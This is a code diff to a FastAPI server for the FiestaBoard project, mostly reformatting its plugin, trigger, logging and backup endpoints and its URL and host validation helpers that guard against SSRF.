 class PluginConfigRequest(BaseModel):
     """Request body for plugin configuration updates."""
-
     config: dict[str, Any]
 
 
 class PluginEnableRequest(BaseModel):
     """Request body for enabling/disabling a plugin."""
-
     enabled: bool
 
 
@@ -7030,7 +7184,10 @@ async def list_plugins():
     Returns plugins with their status, metadata, and whether they're enabled.
     """
     if not PLUGIN_SYSTEM_AVAILABLE:
-        raise HTTPException(status_code=503, detail="Plugin system is not available.")
+        raise HTTPException(
+            status_code=503,
+            detail="Plugin system is not available."
+        )
 
     registry = get_plugin_registry()
     plugins = registry.list_plugins()
@@ -7051,7 +7208,7 @@ async def list_plugins():
         "plugins": plugins,
         "plugin_system_enabled": True,
         "total": len(plugins),
-        "enabled_count": sum(1 for p in plugins if p.get("enabled", False)),
+        "enabled_count": sum(1 for p in plugins if p.get("enabled", False))
     }
 
 
@@ -7068,7 +7225,7 @@ async def get_all_plugin_variables():
         return {
             "variables": template_engine.get_available_variables(),
             "max_lengths": template_engine.get_variable_max_lengths(),
-            "plugin_system_enabled": False,
+            "plugin_system_enabled": False
         }
 
     registry = get_plugin_registry()
@@ -7076,7 +7233,7 @@ async def get_all_plugin_variables():
     return {
         "variables": registry.get_all_variables(),
         "max_lengths": registry.get_all_max_lengths(),
-        "plugin_system_enabled": True,
+        "plugin_system_enabled": True
     }
 
 
@@ -7088,11 +7245,17 @@ async def get_plugin_errors():
     Returns errors from plugins that failed to load.
     """
     if not PLUGIN_SYSTEM_AVAILABLE:
-        return {"errors": {}, "plugin_system_enabled": False}
+        return {
+            "errors": {},
+            "plugin_system_enabled": False
+        }
 
     registry = get_plugin_registry()
 
-    return {"errors": registry.get_load_errors(), "plugin_system_enabled": True}
+    return {
+        "errors": registry.get_load_errors(),
+        "plugin_system_enabled": True
+    }
 
 
 @app.get("/plugins/registry")
@@ -7103,7 +7266,9 @@ async def list_registry_plugins():
     Returns registry entries with their installation status.
     """
     if not PLUGIN_SYSTEM_AVAILABLE:
-        raise HTTPException(status_code=503, detail="Plugin system is not available.")
+        raise HTTPException(
+            status_code=503, detail="Plugin system is not available."
+        )
 
     registry = get_plugin_registry()
 
@@ -7122,7 +7287,9 @@ async def get_plugin_updates():
     ``POST /plugins/updates/check`` to trigger an immediate check.
     """
     if not PLUGIN_SYSTEM_AVAILABLE:
-        raise HTTPException(status_code=503, detail="Plugin system is not available.")
+        raise HTTPException(
+            status_code=503, detail="Plugin system is not available."
+        )
 
     registry = get_plugin_registry()
     return {"updates": registry.get_update_status()}
@@ -7136,13 +7303,19 @@ async def get_plugin(plugin_id: str):
     Returns the plugin's manifest, configuration, and status.
     """
     if not PLUGIN_SYSTEM_AVAILABLE:
-        raise HTTPException(status_code=503, detail="Plugin system is not available.")
+        raise HTTPException(
+            status_code=503,
+            detail="Plugin system is not available."
+        )
 
     registry = get_plugin_registry()
     manifest = registry.get_manifest(plugin_id)
 
     if not manifest:
-        raise HTTPException(status_code=404, detail=f"Plugin not found: {plugin_id}")
+        raise HTTPException(
+            status_code=404,
+            detail=f"Plugin not found: {plugin_id}"
+        )
 
     # Get configuration
     config_manager = get_config_manager()
@@ -7153,9 +7326,8 @@ async def get_plugin(plugin_id: str):
     demo_page_id = None
     if has_demo:
         page_service = get_page_service()
-        demo_page = page_service.get_demo_page(plugin_id, device_type="flagship") or page_service.get_demo_page(
-            plugin_id
-        )
+        demo_page = page_service.get_demo_page(plugin_id, device_type="flagship") \
+            or page_service.get_demo_page(plugin_id)
         if demo_page:
             demo_page_id = demo_page.id
 
@@ -7194,13 +7366,19 @@ async def get_plugin_manifest(plugin_id: str):
     Returns the raw manifest data for UI rendering.
     """
     if not PLUGIN_SYSTEM_AVAILABLE:
-        raise HTTPException(status_code=503, detail="Plugin system is not available.")
+        raise HTTPException(
+            status_code=503,
+            detail="Plugin system is not available."
+        )
 
     registry = get_plugin_registry()
     manifest = registry.get_manifest(plugin_id)
 
     if not manifest:
-        raise HTTPException(status_code=404, detail=f"Plugin not found: {plugin_id}")
+        raise HTTPException(
+            status_code=404,
+            detail=f"Plugin not found: {plugin_id}"
+        )
 
     return manifest.raw
 
@@ -7224,19 +7402,28 @@ async def update_plugin_config(plugin_id: str, request: PluginConfigRequest):
     }
     """
     if not PLUGIN_SYSTEM_AVAILABLE:
-        raise HTTPException(status_code=503, detail="Plugin system is not available.")
+        raise HTTPException(
+            status_code=503,
+            detail="Plugin system is not available."
+        )
 
     registry = get_plugin_registry()
 
     # Check if plugin exists
     if not registry.get_plugin(plugin_id):
-        raise HTTPException(status_code=404, detail=f"Plugin not found: {plugin_id}")
+        raise HTTPException(
+            status_code=404,
+            detail=f"Plugin not found: {plugin_id}"
+        )
 
     # Validate configuration against manifest schema
     errors = registry.set_plugin_config(plugin_id, request.config)
     if errors:
         logger.error(f"Plugin '{plugin_id}' config validation failed: {errors}")
-        raise HTTPException(status_code=400, detail={"errors": errors})
+        raise HTTPException(
+            status_code=400,
+            detail={"errors": errors}
+        )
 
     # Save to config file
     config_manager = get_config_manager()
@@ -7254,7 +7441,7 @@ async def update_plugin_config(plugin_id: str, request: PluginConfigRequest):
     return {
         "status": "success",
         "plugin_id": plugin_id,
-        "config": config_manager._mask_sensitive(updated) if updated else {},
+        "config": config_manager._mask_sensitive(updated) if updated else {}
     }
 
 
@@ -7266,17 +7453,26 @@ async def enable_plugin(plugin_id: str):
     Enables the plugin in both the registry and persists to config.
     """
     if not PLUGIN_SYSTEM_AVAILABLE:
-        raise HTTPException(status_code=503, detail="Plugin system is not available.")
+        raise HTTPException(
+            status_code=503,
+            detail="Plugin system is not available."
+        )
 
     registry = get_plugin_registry()
 
     if not registry.get_plugin(plugin_id):
-        raise HTTPException(status_code=404, detail=f"Plugin not found: {plugin_id}")
+        raise HTTPException(
+            status_code=404,
+            detail=f"Plugin not found: {plugin_id}"
+        )
 
     # Enable in registry
     success = registry.enable_plugin(plugin_id)
     if not success:
-        raise HTTPException(status_code=400, detail=f"Failed to enable plugin: {plugin_id}")
+        raise HTTPException(
+            status_code=400,
+            detail=f"Failed to enable plugin: {plugin_id}"
+        )
 
     # Persist to config
     config_manager = get_config_manager()
@@ -7288,7 +7484,11 @@ async def enable_plugin(plugin_id: str):
 
     logger.info(f"Plugin '{plugin_id}' enabled")
 
-    return {"status": "success", "plugin_id": plugin_id, "enabled": True}
+    return {
+        "status": "success",
+        "plugin_id": plugin_id,
+        "enabled": True
+    }
 
 
 @app.post("/plugins/{plugin_id}/disable")
@@ -7299,17 +7499,26 @@ async def disable_plugin(plugin_id: str):
     Disables the plugin in both the registry and persists to config.
     """
     if not PLUGIN_SYSTEM_AVAILABLE:
-        raise HTTPException(status_code=503, detail="Plugin system is not available.")
+        raise HTTPException(
+            status_code=503,
+            detail="Plugin system is not available."
+        )
 
     registry = get_plugin_registry()
 
     if not registry.get_plugin(plugin_id):
-        raise HTTPException(status_code=404, detail=f"Plugin not found: {plugin_id}")
+        raise HTTPException(
+            status_code=404,
+            detail=f"Plugin not found: {plugin_id}"
+        )
 
     # Disable in registry
     success = registry.disable_plugin(plugin_id)
     if not success:
-        raise HTTPException(status_code=400, detail=f"Failed to disable plugin: {plugin_id}")
+        raise HTTPException(
+            status_code=400,
+            detail=f"Failed to disable plugin: {plugin_id}"
+        )
 
     # Persist to config
     config_manager = get_config_manager()
@@ -7321,7 +7530,11 @@ async def disable_plugin(plugin_id: str):
 
     logger.info(f"Plugin '{plugin_id}' disabled")
 
-    return {"status": "success", "plugin_id": plugin_id, "enabled": False}
+    return {
+        "status": "success",
+        "plugin_id": plugin_id,
+        "enabled": False
+    }
 
 
 @app.get("/plugins/{plugin_id}/data")
@@ -7332,29 +7545,41 @@ async def get_plugin_data(plugin_id: str):
     Returns the plugin's latest data, formatted output, and status.
     """
     if not PLUGIN_SYSTEM_AVAILABLE:
-        raise HTTPException(status_code=503, detail="Plugin system is not available.")
+        raise HTTPException(
+            status_code=503,
+            detail="Plugin system is not available."
+        )
 
     registry = get_plugin_registry()
 
     if not registry.get_plugin(plugin_id):
-        raise HTTPException(status_code=404, detail=f"Plugin not found: {plugin_id}")
+        raise HTTPException(
+            status_code=404,
+            detail=f"Plugin not found: {plugin_id}"
+        )
 
     if not registry.is_enabled(plugin_id):
-        raise HTTPException(status_code=400, detail=f"Plugin not enabled: {plugin_id}")
+        raise HTTPException(
+            status_code=400,
+            detail=f"Plugin not enabled: {plugin_id}"
+        )
 
     result = registry.fetch_plugin_data(plugin_id)
 
     # Return 503 when plugin data is unavailable (e.g. not configured, auth failure)
     # so monitoring (Grafana) and request log show it as an error for triage
     if not result.available:
-        raise HTTPException(status_code=503, detail=result.error or "Plugin data not available")
+        raise HTTPException(
+            status_code=503,
+            detail=result.error or "Plugin data not available"
+        )
 
     return {
         "plugin_id": plugin_id,
         "available": result.available,
         "data": result.data,
         "formatted_lines": result.formatted_lines,
-        "error": result.error,
+        "error": result.error
     }
 
 
@@ -7366,19 +7591,25 @@ async def get_plugin_variables(plugin_id: str):
     Returns the variables schema for use in the template editor.
     """
     if not PLUGIN_SYSTEM_AVAILABLE:
-        raise HTTPException(status_code=503, detail="Plugin system is not available.")
+        raise HTTPException(
+            status_code=503,
+            detail="Plugin system is not available."
+        )
 
     registry = get_plugin_registry()
     manifest = registry.get_manifest(plugin_id)
 
     if not manifest:
-        raise HTTPException(status_code=404, detail=f"Plugin not found: {plugin_id}")
+        raise HTTPException(
+            status_code=404,
+            detail=f"Plugin not found: {plugin_id}"
+        )
 
     return {
         "plugin_id": plugin_id,
         "variables": manifest.raw.get("variables", {}),
         "max_lengths": manifest.max_lengths,
-        "color_rules_schema": manifest.raw.get("color_rules_schema", {}),
+        "color_rules_schema": manifest.raw.get("color_rules_schema", {})
     }
 
 
@@ -7449,12 +7680,15 @@ async def create_plugin_demo_page(plugin_id: str, device_type: str = "flagship")
     if required_fields:
         config_manager = get_config_manager()
         plugin_config = config_manager.get_plugin_config(plugin_id) or {}
-        missing = [f for f in required_fields if f != "enabled" and not plugin_config.get(f)]
+        missing = [
+            f for f in required_fields
+            if f != "enabled" and not plugin_config.get(f)
+        ]
         if missing:
             raise HTTPException(
                 status_code=400,
                 detail=f"Required settings not configured: {', '.join(missing)}. "
-                f"Configure them first before creating a demo page.",
+                       f"Configure them first before creating a demo page.",
             )
 
     page_service = get_page_service()
@@ -7471,7 +7705,6 @@ async def create_plugin_demo_page(plugin_id: str, device_type: str = "flagship")
 
 class PluginInstanceCreateRequest(BaseModel):
     """Request body for creating a new plugin instance."""
-
     label: str
 
 
@@ -7483,7 +7716,9 @@ async def list_plugin_instances(plugin_id: str):
     Returns the instances (excluding the base) for the given plugin.
     """
     if not PLUGIN_SYSTEM_AVAILABLE:
-        raise HTTPException(status_code=503, detail="Plugin system is not available.")
+        raise HTTPException(
+            status_code=503, detail="Plugin system is not available."
+        )
 
     registry = get_plugin_registry()
 
@@ -7491,7 +7726,10 @@ async def list_plugin_instances(plugin_id: str):
     base_id, _ = registry.parse_instance_key(plugin_id)
 
     if not registry.get_plugin(base_id):
-        raise HTTPException(status_code=404, detail=f"Plugin not found: {base_id}")
+        raise HTTPException(
+            status_code=404,
+            detail=f"Plugin not found: {base_id}"
+        )
 
     instances = registry.list_instances(base_id)
 
@@ -7513,7 +7751,9 @@ async def create_plugin_instance(plugin_id: str, request: PluginInstanceCreateRe
     ``{plugin_id}:{label}``.
     """
     if not PLUGIN_SYSTEM_AVAILABLE:
-        raise HTTPException(status_code=503, detail="Plugin system is not available.")
+        raise HTTPException(
+            status_code=503, detail="Plugin system is not available."
+        )
 
     registry = get_plugin_registry()
 
@@ -7521,7 +7761,10 @@ async def create_plugin_instance(plugin_id: str, request: PluginInstanceCreateRe
     base_id, _ = registry.parse_instance_key(plugin_id)
 
     if not registry.get_plugin(base_id):
-        raise HTTPException(status_code=404, detail=f"Plugin not found: {base_id}")
+        raise HTTPException(
+            status_code=404,
+            detail=f"Plugin not found: {base_id}"
+        )
 
     errors = registry.create_instance(base_id, request.label)
     if errors:
@@ -7556,7 +7799,9 @@ async def delete_plugin_instance(plugin_id: str, instance_label: str):
     Removes the instance from the registry and its persisted configuration.
     """
     if not PLUGIN_SYSTEM_AVAILABLE:
-        raise HTTPException(status_code=503, detail="Plugin system is not available.")
+        raise HTTPException(
+            status_code=503, detail="Plugin system is not available."
+        )
 
     registry = get_plugin_registry()
 
@@ -7640,7 +7885,6 @@ async def receive_plugin_payload(plugin_id: str, request: Request):
 
 class ExternalPluginInstallRequest(BaseModel):
     """Request body for installing an external plugin."""
-
     repository: str
     plugin_id: str | None = None
     branch: str = ""
@@ -7652,7 +7896,9 @@ async def install_registry_plugin(plugin_id: str):
     Install a plugin from the curated registry by its id.
     """
     if not PLUGIN_SYSTEM_AVAILABLE:
-        raise HTTPException(status_code=503, detail="Plugin system is not available.")
+        raise HTTPException(
+            status_code=503, detail="Plugin system is not available."
+        )
 
     registry = get_plugin_registry()
     errors = registry.install_from_registry(plugin_id)
@@ -7676,12 +7922,13 @@ async def install_external_plugin(request: ExternalPluginInstallRequest):
     naming convention (that requirement only applies to registry plugins).
     """
     if not PLUGIN_SYSTEM_AVAILABLE:
-        raise HTTPException(status_code=503, detail="Plugin system is not available.")
+        raise HTTPException(
+            status_code=503, detail="Plugin system is not available."
+        )
 
     safe_branch = request.branch or ""
     if safe_branch:
         from .plugins.sources import _validate_git_ref
-
         _ok, _err = _validate_git_ref(safe_branch)
         if not _ok:
             raise HTTPException(status_code=400, detail=_err)
@@ -7702,7 +7949,6 @@ async def install_external_plugin(request: ExternalPluginInstallRequest):
     pid = safe_plugin_id
     if pid is None:
         from .plugins.sources import plugin_id_from_repo_name, repo_name_from_url
-
         pid = plugin_id_from_repo_name(repo_name_from_url(request.repository))
 
     return {
@@ -7720,13 +7966,17 @@ async def uninstall_external_plugin(plugin_id: str):
     Built-in plugins shipped with FiestaBoard cannot be uninstalled.
     """
     if not PLUGIN_SYSTEM_AVAILABLE:
-        raise HTTPException(status_code=503, detail="Plugin system is not available.")
+        raise HTTPException(
+            status_code=503, detail="Plugin system is not available."
+        )
 
     registry = get_plugin_registry()
 
     # Collect instance compound keys before uninstall so we can purge their configs
     instance_keys = [
-        p["id"] for p in registry.list_plugins() if p.get("base_plugin_id") == plugin_id and p.get("instance_label")
+        p["id"]
+        for p in registry.list_plugins()
+        if p.get("base_plugin_id") == plugin_id and p.get("instance_label")
     ]
 
     errors = registry.uninstall_external_plugin(plugin_id)
@@ -7754,7 +8004,9 @@ async def trigger_plugin_update_check():
     pool so the event loop is not blocked.
     """
     if not PLUGIN_SYSTEM_AVAILABLE:
-        raise HTTPException(status_code=503, detail="Plugin system is not available.")
+        raise HTTPException(
+            status_code=503, detail="Plugin system is not available."
+        )
 
     registry = get_plugin_registry()
     loop = asyncio.get_event_loop()
@@ -7774,7 +8026,9 @@ async def update_plugin(plugin_id: str):
     Built-in plugins cannot be updated via this endpoint.
     """
     if not PLUGIN_SYSTEM_AVAILABLE:
-        raise HTTPException(status_code=503, detail="Plugin system is not available.")
+        raise HTTPException(
+            status_code=503, detail="Plugin system is not available."
+        )
 
     registry = get_plugin_registry()
     source = registry.get_plugin_source(plugin_id)
@@ -7848,10 +8102,14 @@ async def apply_all_plugin_updates():
     inspect partial results.
     """
     if not PLUGIN_SYSTEM_AVAILABLE:
-        raise HTTPException(status_code=503, detail="Plugin system is not available.")
+        raise HTTPException(
+            status_code=503, detail="Plugin system is not available."
+        )
 
     registry = get_plugin_registry()
-    pending = [pid for pid, has_update in registry.get_update_status().items() if has_update]
+    pending = [
+        pid for pid, has_update in registry.get_update_status().items() if has_update
+    ]
 
     if not pending:
         return {"updated": [], "failed": {}, "message": "No updates available."}
@@ -7913,12 +8171,10 @@ async def apply_all_plugin_updates():
 # Triggers — Event-based plugin messages
 # =============================================================================
 
-
 @app.get("/triggers")
 async def list_triggers():
     """List all active triggers with their status."""
     from .triggers.service import get_trigger_service
-
     trigger_service = get_trigger_service()
     active = trigger_service.list_active_triggers()
     return {
@@ -7931,7 +8187,6 @@ async def list_triggers():
 async def get_active_trigger():
     """Get the current highest-priority active trigger, if any."""
     from .triggers.service import get_trigger_service
-
     trigger_service = get_trigger_service()
     active = trigger_service.get_active_trigger()
     if active is None:
@@ -7943,7 +8198,6 @@ async def get_active_trigger():
 async def dismiss_trigger(trigger_id: str):
     """Dismiss (remove) a specific trigger by its id."""
     from .triggers.service import get_trigger_service
-
     trigger_service = get_trigger_service()
     dismissed = trigger_service.dismiss_trigger(trigger_id)
     if not dismissed:
@@ -7955,7 +8209,6 @@ async def dismiss_trigger(trigger_id: str):
 async def clear_triggers():
     """Clear all active triggers."""
     from .triggers.service import get_trigger_service
-
     trigger_service = get_trigger_service()
     trigger_service.clear_all()
     return {"status": "cleared"}
@@ -7969,10 +8222,11 @@ async def check_triggers():
     endpoint allows the UI or external systems to force an immediate check.
     """
     if not PLUGIN_SYSTEM_AVAILABLE:
-        raise HTTPException(status_code=503, detail="Plugin system is not available.")
+        raise HTTPException(
+            status_code=503, detail="Plugin system is not available."
+        )
 
     from .triggers.service import get_trigger_service
-
     registry = get_plugin_registry()
     trigger_service = get_trigger_service()
 
@@ -7992,7 +8246,6 @@ async def check_triggers():
 # =============================================================================
 # Generic Data Plugin — Test Fetch
 # =============================================================================
-
 
 @app.post("/generic-data/test-fetch")
 async def generic_data_test_fetch(request: dict):
@@ -8072,7 +8325,11 @@ async def generic_data_test_fetch(request: dict):
     try:
         kwargs: dict = {"headers": headers, "timeout": 15, "allow_redirects": False}
         if method == "POST" and body:
-            kwargs["data"] = interpolate_string(body, _interp_vars) if isinstance(body, str) else body
+            kwargs["data"] = (
+                interpolate_string(body, _interp_vars)
+                if isinstance(body, str)
+                else body
+            )
 
         resp = req.request(method, url, **kwargs)
         resp.raise_for_status()
@@ -8082,7 +8339,6 @@ async def generic_data_test_fetch(request: dict):
 
         if fmt == "xml":
             from plugins.generic_data import _xml_to_dict
-
             # ``defusedxml`` disables external entity expansion, DTDs and
             # entity bombs by default, mitigating XXE attacks.
             root = DefusedET.fromstring(resp.text)
@@ -8150,7 +8406,9 @@ async def import_backup(
     from .backup import BackupError, get_backup_service
 
     try:
-        result = get_backup_service().import_from_dict(payload, reinstall_plugins=reinstall_plugins)
+        result = get_backup_service().import_from_dict(
+            payload, reinstall_plugins=reinstall_plugins
+        )
     except BackupError as exc:
         raise HTTPException(status_code=400, detail=str(exc)) from exc
     except Exception:
@@ -8162,5 +8420,4 @@ async def import_backup(
 
 if __name__ == "__main__":
     import uvicorn
-
     uvicorn.run(app, host="0.0.0.0", port=8000)

--- a/src/api_server.py
+++ b/src/api_server.py
@@ -99,9 +99,7 @@ def _validate_request_url(
     if not parsed.hostname:
         raise HTTPException(status_code=400, detail="URL is missing a host")
     if parsed.username is not None or parsed.password is not None:
-        raise HTTPException(
-            status_code=400, detail="URL must not contain credentials"
-        )
+        raise HTTPException(status_code=400, detail="URL must not contain credentials")
     # Block requests targeting private/loopback/link-local addresses to
     # prevent SSRF against internal services.
     _h = parsed.hostname.lower().rstrip(".")
@@ -112,13 +110,7 @@ def _validate_request_url(
         )
     try:
         _addr = ipaddress.ip_address(_h)
-        if (
-            _addr.is_private
-            or _addr.is_loopback
-            or _addr.is_link_local
-            or _addr.is_reserved
-            or _addr.is_multicast
-        ):
+        if _addr.is_private or _addr.is_loopback or _addr.is_link_local or _addr.is_reserved or _addr.is_multicast:
             raise HTTPException(
                 status_code=400,
                 detail="URL must not target internal network resources",
@@ -127,7 +119,7 @@ def _validate_request_url(
         pass  # Not an IP literal; hostname-based domains are permitted
 
     host = parsed.hostname.strip().lower()
-    if host == "localhost" or host.endswith(".localhost") or host.endswith(".local"):
+    if host == "localhost" or host.endswith((".localhost", ".local")):
         raise HTTPException(status_code=400, detail="URL host is not allowed")
 
     def _is_non_public_ip(ip_str: str) -> bool:
@@ -174,10 +166,7 @@ def _get_generic_data_allowed_hosts() -> list[str]:
 def _is_host_allowed(host: str, allowed_hosts: list[str]) -> bool:
     """Check whether host is exactly allowed or a subdomain of an allowed host."""
     h = (host or "").strip().lower().rstrip(".")
-    for allowed in allowed_hosts:
-        if h == allowed or h.endswith("." + allowed):
-            return True
-    return False
+    return any(h == allowed or h.endswith("." + allowed) for allowed in allowed_hosts)
 
 
 # Hostnames are restricted to RFC 1123 labels (letters, digits, hyphens) and
@@ -200,6 +189,8 @@ def _sanitize_optional_plugin_id(plugin_id: str | None) -> str | None:
             detail="plugin_id may contain only lowercase letters, digits, and underscores",
         )
     return plugin_id
+
+
 # IPv4 dotted-quad notation.  This rejects exotic forms (URL-encoded chars,
 # ``user:pass@host``, schemes embedded in the host, etc.) before we ever try
 # to connect to a board over HTTP.
@@ -251,11 +242,7 @@ def _validate_board_host_is_local_network(host: str) -> None:
     import socket
 
     def _is_allowed_ipv4(addr: ipaddress.IPv4Address) -> bool:
-        return (
-            addr.is_private
-            or addr.is_loopback
-            or addr.is_link_local
-        )
+        return addr.is_private or addr.is_loopback or addr.is_link_local
 
     try:
         ip = ipaddress.IPv4Address(host)
@@ -273,11 +260,7 @@ def _validate_board_host_is_local_network(host: str) -> None:
     except socket.gaierror:
         raise HTTPException(status_code=400, detail="host could not be resolved") from None
 
-    resolved_ips = {
-        ipaddress.IPv4Address(info[4][0])
-        for info in addrinfo
-        if info and len(info) >= 5 and info[4]
-    }
+    resolved_ips = {ipaddress.IPv4Address(info[4][0]) for info in addrinfo if info and len(info) >= 5 and info[4]}
     if not resolved_ips:
         raise HTTPException(status_code=400, detail="host did not resolve to an IPv4 address")
 
@@ -300,16 +283,18 @@ _shutting_down = False  # Set during app shutdown to suppress auto-restart
 _log_buffer: deque = deque(maxlen=500)
 _log_lock = threading.Lock()
 
+
 def _create_log_entry(record: logging.LogRecord, formatted_message: str) -> dict[str, Any]:
     """Create a structured log entry from a log record with UTC timestamp."""
     from .time_service import get_time_service
+
     time_service = get_time_service()
 
     return {
         "timestamp": time_service.create_utc_timestamp(),
         "level": record.levelname,
         "logger": record.name,
-        "message": formatted_message
+        "message": formatted_message,
     }
 
 
@@ -332,7 +317,7 @@ class JSONFileHandler(logging.handlers.RotatingFileHandler):
         try:
             log_entry = _create_log_entry(record, self.format(record))
             # Write as JSON line
-            msg = json.dumps(log_entry) + '\n'
+            msg = json.dumps(log_entry) + "\n"
             stream = self.stream
             stream.write(msg)
             self.flush()
@@ -361,12 +346,9 @@ def _setup_file_logging():
 
         # Create JSON file handler with rotation
         file_handler = JSONFileHandler(
-            str(LOG_FILE),
-            maxBytes=LOG_MAX_BYTES,
-            backupCount=LOG_BACKUP_COUNT,
-            encoding='utf-8'
+            str(LOG_FILE), maxBytes=LOG_MAX_BYTES, backupCount=LOG_BACKUP_COUNT, encoding="utf-8"
         )
-        file_handler.setFormatter(logging.Formatter('%(message)s'))
+        file_handler.setFormatter(logging.Formatter("%(message)s"))
         file_handler.setLevel(logging.INFO)
 
         # Add to root logger
@@ -377,10 +359,7 @@ def _setup_file_logging():
 
 
 def _read_logs_from_files(
-    limit: int = 100,
-    offset: int = 0,
-    level: str | None = None,
-    search: str | None = None
+    limit: int = 100, offset: int = 0, level: str | None = None, search: str | None = None
 ) -> tuple[list[dict[str, Any]], int, bool]:
     """
     Read logs from log files with filtering and pagination.
@@ -401,7 +380,7 @@ def _read_logs_from_files(
         if not log_file.exists():
             continue
         try:
-            with open(log_file, encoding='utf-8') as f:
+            with log_file.open(encoding="utf-8") as f:
                 lines = f.readlines()
                 for line in reversed(lines):
                     line = line.strip()
@@ -425,13 +404,13 @@ def _read_logs_from_files(
     merged_logs = []
 
     for log in reversed(memory_logs):
-        key = (log.get('timestamp'), log.get('message'))
+        key = (log.get("timestamp"), log.get("message"))
         if key not in seen:
             seen.add(key)
             merged_logs.append(log)
 
     for log in all_logs:
-        key = (log.get('timestamp'), log.get('message'))
+        key = (log.get("timestamp"), log.get("message"))
         if key not in seen:
             seen.add(key)
             merged_logs.append(log)
@@ -441,14 +420,14 @@ def _read_logs_from_files(
 
     if level:
         level_upper = level.upper()
-        filtered_logs = [log for log in filtered_logs if log.get('level') == level_upper]
+        filtered_logs = [log for log in filtered_logs if log.get("level") == level_upper]
 
     if search:
         search_lower = search.lower()
         filtered_logs = [
-            log for log in filtered_logs
-            if search_lower in log.get('message', '').lower() or
-               search_lower in log.get('logger', '').lower()
+            log
+            for log in filtered_logs
+            if search_lower in log.get("message", "").lower() or search_lower in log.get("logger", "").lower()
         ]
 
     total_matching = len(filtered_logs)
@@ -464,11 +443,13 @@ def _read_logs_from_files(
 
 class MessageRequest(BaseModel):
     """Request model for sending a custom message."""
+
     text: str
 
 
 class StatusResponse(BaseModel):
     """Response model for service status."""
+
     running: bool
     initialized: bool
     config_summary: dict[str, Any]
@@ -476,6 +457,7 @@ class StatusResponse(BaseModel):
 
 class HealthResponse(BaseModel):
     """Response model for health check."""
+
     status: str
     service_running: bool
     version: str
@@ -483,6 +465,7 @@ class HealthResponse(BaseModel):
 
 class VersionResponse(BaseModel):
     """Response model for version information."""
+
     package_version: str
     build_version: str
     is_dev: bool
@@ -491,6 +474,7 @@ class VersionResponse(BaseModel):
 
 class UpdateCheckResponse(BaseModel):
     """Response model for update check."""
+
     current_version: str
     latest_version: str | None
     update_available: bool
@@ -501,6 +485,7 @@ class UpdateCheckResponse(BaseModel):
 
 class UpdateStatusResponse(BaseModel):
     """Response model for system update status (sidecar availability + auto-update flag)."""
+
     updater_available: bool
     auto_update_enabled: bool  # derived: True when interval != "manual"
     auto_update_interval: str  # "daily" | "weekly" | "monthly" | "manual"
@@ -530,6 +515,7 @@ class UpdateStatusResponse(BaseModel):
 
 class UpdateApplyResponse(BaseModel):
     """Response model for triggering an update."""
+
     status: str  # "queued" | "manual"
     mode: str  # "sidecar" | "manual"
     previous_digest: str | None = None
@@ -556,6 +542,7 @@ class RollbackRequest(BaseModel):
     * ``restore_image`` — when False, only the settings are rolled back
       (image is left untouched).  Defaults to True.
     """
+
     snapshot: str | None = None
     restore_settings: bool = True
     restore_image: bool = True
@@ -563,6 +550,7 @@ class RollbackRequest(BaseModel):
 
 class RollbackResponse(BaseModel):
     """Response model for the user-initiated rollback endpoint."""
+
     status: str  # "success" | "queued" | "partial"
     snapshot: str | None = None
     image_rollback: dict[str, Any] | None = None  # {target_digest, target_image, queued} or None
@@ -578,20 +566,23 @@ class AutoUpdateRequest(BaseModel):
     is mapped to the install's default interval and False is mapped to
     ``manual``.  At least one of the two must be provided.
     """
+
     enabled: bool | None = None
     interval: str | None = None
 
 
 class AutoUpdateResponse(BaseModel):
     """Response model for auto-update toggle."""
+
     enabled: bool  # derived: True when interval != "manual"
     interval: str  # "daily" | "weekly" | "monthly" | "manual"
 
 
 class SystemActionResponse(BaseModel):
     """Response model for restart / shutdown system actions."""
-    status: str   # "queued"
-    action: str   # "restart" | "shutdown"
+
+    status: str  # "queued"
+    action: str  # "restart" | "shutdown"
 
 
 # ── WiFi / NetworkManager models ─────────────────────────────────────────────
@@ -654,6 +645,7 @@ async def lifespan(app: FastAPI):
     _mcp_ctx = None
     try:
         from .mcp_server import mcp_server as _mcp_for_lifespan
+
         if _mcp_for_lifespan is not None:
             _mcp_ctx = _mcp_for_lifespan.session_manager.run()
     except Exception as _mcp_exc:  # pragma: no cover — defensive
@@ -685,7 +677,9 @@ async def lifespan(app: FastAPI):
             if _service_running:
                 logger.info("Background service auto-started successfully")
             else:
-                logger.warning("Background service failed to start - likely due to configuration issues. Use the /start endpoint or UI to start it manually after fixing configuration.")
+                logger.warning(
+                    "Background service failed to start - likely due to configuration issues. Use the /start endpoint or UI to start it manually after fixing configuration."
+                )
         except Exception as e:
             logger.error(f"Failed to auto-start background service: {e}", exc_info=True)
             logger.warning("Service can be started manually via /start endpoint after configuration is fixed")
@@ -695,8 +689,10 @@ async def lifespan(app: FastAPI):
     # Start mDNS/Bonjour advertisement (fiestaboard.local)
     try:
         from .system.mdns import start_mdns
+
         if start_mdns():
             from .system.mdns import get_mdns_service
+
             logger.info("Access FiestaBoard at %s", get_mdns_service().local_url)
     except Exception as e:
         logger.warning(f"mDNS service could not be started: {e}")
@@ -704,6 +700,7 @@ async def lifespan(app: FastAPI):
     # Start MQTT client for Home Assistant discovery/control (optional)
     try:
         from .settings.service import get_settings_service
+
         mqtt_cfg = get_settings_service().get_mqtt_settings()
         if mqtt_cfg.enabled:
             _apply_mqtt_config(mqtt_cfg)
@@ -724,9 +721,7 @@ async def lifespan(app: FastAPI):
                 try:
                     if PLUGIN_SYSTEM_AVAILABLE:
                         registry = get_plugin_registry()
-                        results = await _asyncio.get_event_loop().run_in_executor(
-                            None, registry.check_for_updates
-                        )
+                        results = await _asyncio.get_event_loop().run_in_executor(None, registry.check_for_updates)
                         updates = [p for p, v in results.items() if v]
                         if updates:
                             auto_update = get_settings_service().get_plugin_settings().auto_update
@@ -754,6 +749,7 @@ async def lifespan(app: FastAPI):
     # the user having to open Settings and click Refresh.
     system_update_task = None
     try:
+
         async def _system_update_check_loop():
             # Tick once an hour.  Even on the longest interval (monthly) this
             # is plenty granular and keeps the work the loop does tiny.
@@ -805,6 +801,7 @@ async def lifespan(app: FastAPI):
     # Stop MQTT client
     try:
         from .mqtt import get_mqtt_client, set_mqtt_client_instance
+
         mqtt_client = get_mqtt_client()
         if mqtt_client:
             mqtt_client.stop()
@@ -816,6 +813,7 @@ async def lifespan(app: FastAPI):
     # Stop mDNS advertisement
     try:
         from .system.mdns import stop_mdns
+
         stop_mdns()
     except Exception:
         logger.debug("Failed to stop mDNS during shutdown", exc_info=True)
@@ -847,6 +845,7 @@ app.add_middleware(
 # Gracefully skipped if the mcp package is not installed.
 try:
     from .mcp_server import mcp_server as _mcp_server_instance
+
     if _mcp_server_instance is not None:
